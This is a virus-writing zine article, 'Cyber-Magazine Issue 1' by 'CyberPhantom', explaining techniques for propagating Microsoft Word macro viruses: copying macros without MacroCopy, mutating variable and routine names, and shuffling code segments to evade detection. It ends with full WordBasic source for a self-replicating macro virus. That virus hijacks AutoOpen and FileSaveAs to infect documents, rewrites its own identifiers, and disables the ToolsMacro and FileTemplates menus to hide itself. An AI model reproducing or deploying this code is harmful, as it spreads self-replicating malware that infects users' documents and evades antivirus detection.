Cyber-Magazine Issue 1 This magazine is dedicated to exploration of other techniques available for Microsoft Word Macro Virus propagation. First: It is possible to propagate macros other than with the standard MacroCopy command. It is possible to use the ToolsMacro. Edit command to create a new macro and then insert text into it directly. The text can be copied out of the creating macro using LineUp, LineDown, CharLeft, and CharRight commands with the X, 1 flag set to select the desired text. Follow this with an EditCopy command and the EditPaste in the "blank" macro and you have created a macro without using the MacroCopy command. This functionality allows you to store all of your macros in one single macro while in "transit" (an infected document) and to "extract" the macros upon delivery to the target (NORMAL.DOT to be infected), including your stealth macros (unless, of course, your stealth macros ARE the infection vector). (see example virus) Second: More Mutation: Using the above technique as a starting point, it is possible to create better mutation than just mutating macro names. It is in fact possible to create mutating variable names and mutating Sub/Function names. To do so, it is imperative that your code knows exactly where and long the variable/routine-name to be mutated is (at least one sample of it). If you know that one location in a macro will never change, you can use that. Then, you can read in the fixed length name with the GetText$(X,X) command. Now, run your random name generator (making certain to generate a name that is THE SAME LENGTH). Finally, use the EditReplace command to swap out all of the old names for the new names. (see example virus) You could also keep a separate "dummy" macro or routine that just stores a list of your ever mutating variable names so that you could have mutating lengths as well. That way, you could just read in the first line in the list as your current variable, mutate it, then do your global replace, then move on to the next in your list. i.e.: sub dummy LKJIIEKDG < ---- first variable LKJS LKJSOALKJBIEWDLA POIEWM SIEFQZCVWT YJFHBWPVU < -----last variable end sub Third: Even More Mutation: Using a combination of the above techniques, it is possible to create mutating code segments. That is, segments of code that change locations within the body of the code. Consider if you will: You could create a macro with several subroutines of exactly the same length. Then when it was time to mutate (say at the next document infection), just use your knowledge that your have three subroutines of exactly the same length, starting at line X below the calling routine, and jumble them around. i.e. sub Main segmentA segmentB segmentC end sub sub segmentA do some stuff end sub sub segmentB do some other stuff end sub sub segmentC do strange stuff end sub could become: sub Main segmentA segmentB segmentC end sub sub segmentB do some other stuff end sub sub segmentC do strange stuff end sub sub segmentA do some stuff end sub or it could become: sub Main segmentA segmentB segmentC end sub sub segmentB do some other stuff end sub sub segmentA do some stuff end sub sub segmentC do strange stuff end sub Or it could become ANY permutation in the set! Plus, the more subroutines you have to "jumble," the better the mutation becomes! Fourth: The future? Only you can determine what's in the future. Be creative! -CyberPhantom Example Virus: (Infected Document Code) =============================== Sub MAIN On Error Resume Next ToolsMacro .Name = "autoopen", .Show = 1, .Delete ToolsMacro .Name = "FileSaveAs", .Show = 1, .Delete ToolsMacro .Name = "XXXXX", .Show = 1, .Delete AppMinimize ToolsMacro .Name = "autoopen", .Edit, .Show = 3 StartOfDocument EndOfDocument 1 EditCopy DocClose ToolsMacro .Name = "XXXXX", .Show = 1, .Edit StartOfDocument EndOfDocument 1 EditPaste DocClose 1 ToolsMacro .Name = "XXXXX", .Edit, .Show = 1 StartOfDocument LineDown 35 LineDown 9, 1 EditCopy DocClose ToolsMacro .Name = "FileSaveAs", .Edit, .Show = 1 StartOfDocument LineDown 1 EndOfDocument 1 EditPaste DocClose 1 mutat Payld stlth AppRestore End Sub Sub FlSvA Dim _fldg As FileSaveAs GetCurValues _fldg Dialog _fldg If _fldg.Format = 0 Then _fldg.Format = 1 FlNm$ = FileName$() FlMcr$ = FlNm$ + ":AutoOpen" MacroCopy "Global:XXXXX", FlMcr$ FileSaveAs _fldg End Sub Function Rndnm$ For count = 1 To 5 rndnx = Int(Rnd() * (90 - 65) + 65) rndnx$ = rndnx$ + Chr$(rndnx) Next count Rndnm$ = rndnx$ End Function Sub Payld Rndnm = Int(Rnd() * (51 - 1) + 1) If Rndnm = 50 Then MsgBox "Greetings to: CyberDragon, CyberMonk, CyberBard, CyberSage, CyberTeck, CyberHawk, CyberBeef, CyberLich, CyberKnight. From: CyberPhantom" End Sub Sub mutat ToolsMacro .Name = "XXXXX", .Edit, .Show = 1 StartOfDocument dnatx$ = GetText$(606, 611)'mutat EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0 dnatx$ = GetText$(648, 653)'FlSvA EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0 dnatx$ = GetText$(658, 663)'_fldg EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0 dnatx$ = GetText$(612, 617)'Payld EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0 dnatx$ = GetText$(869, 874)'Rndnm EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0 dnatx$ = GetText$(880, 885)'count EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0 dnatx$ = GetText$(1299, 1304)'dnatx EditReplace .Find = dnatx$, .Replace = Rndnm$, .Direction = 0, .MatchCase = 0, .WholeWord = 0, .PatternMatch = 0, .SoundsLike = 0, .ReplaceAll, .Format = 0, .Wrap = 1, .FindAllWordForms = 0 DocClose 1 End Sub Sub stlth ToolsMacro .Name = "XXXXX", .Edit, .Show = 1 StartOfDocument LineDown 123 LineDown 2, 1 EditCopy DocClose ToolsMacro .Name = "ToolsMacro", .Edit, .Show = 1 StartOfDocument LineDown 1 EndOfDocument 1 EditPaste DocClose 1 ToolsMacro .Name = "XXXXX", .Edit, .Show = 1 StartOfDocument LineDown 127 LineDown 2, 1 EditCopy DocClose ToolsMacro .Name = "FileTemplates", .Edit, .Show = 1 StartOfDocument LineDown 1 EndOfDocument 1 EditPaste DocClose 1 End Sub Sub TlsMc 'No Macro End Sub Sub FlTpt 'No Macro End Sub